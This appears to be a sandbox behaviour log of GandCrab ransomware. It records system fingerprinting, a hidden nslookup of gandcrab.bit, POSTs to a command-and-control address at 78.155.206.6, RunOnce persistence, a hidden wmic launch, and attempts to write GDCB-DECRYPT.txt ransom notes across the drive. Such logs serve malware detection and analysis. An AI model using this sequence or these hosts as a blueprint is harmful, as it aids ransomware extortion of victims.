Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup gandcrab.bit a.dnspod.com, os_pid = 0xba8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 147 True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 512 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, desired_access = FILE_MAP_COPY True 1
Fn
Module Unmap process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.155.206.6, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1019, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.155.206.6/curl.php?token=1019 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 5709 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 62796 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 71484 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup gandcrab.bit a.dnspod.com, os_pid = 0x788, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 147 True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 512 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, desired_access = FILE_MAP_COPY True 1
Fn
Module Unmap process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.155.206.6, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1019, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.155.206.6/curl.php?token=1019 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 9 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74caf8d0 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74caf8d0 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic, show_window = SW_HIDE True 1
Fn
Thread 0x7ac
(Host: 4, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, base_address = 0x400000 True 3
Fn
Window Create window_name = firefox, class_name = win32app, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = firefox, class_name = win32app, index = 18446744073709551600, new_long = 0 True 1
Fn
Thread 0x7b0
(Host: 9, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = ycjblgkfwuv, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0x7a0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x824
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x820
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x75c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x814
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x81c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x838
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x804
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x610
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbf0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xb80
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x900
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbec
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xb5c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7f0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xad4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xad8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x8cc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x2cc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x2e0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x77c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x868
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7fc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x87c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7ec
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x4b8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xaa8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xab4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xb68
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x950
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbd8
(Host: 2301, Network: 0)
+
Category Operation Information Success Count Logfile
File Create filename = C:\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-18\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\es-MX\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fr-CA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\PerfLogs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\System Volume Information\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
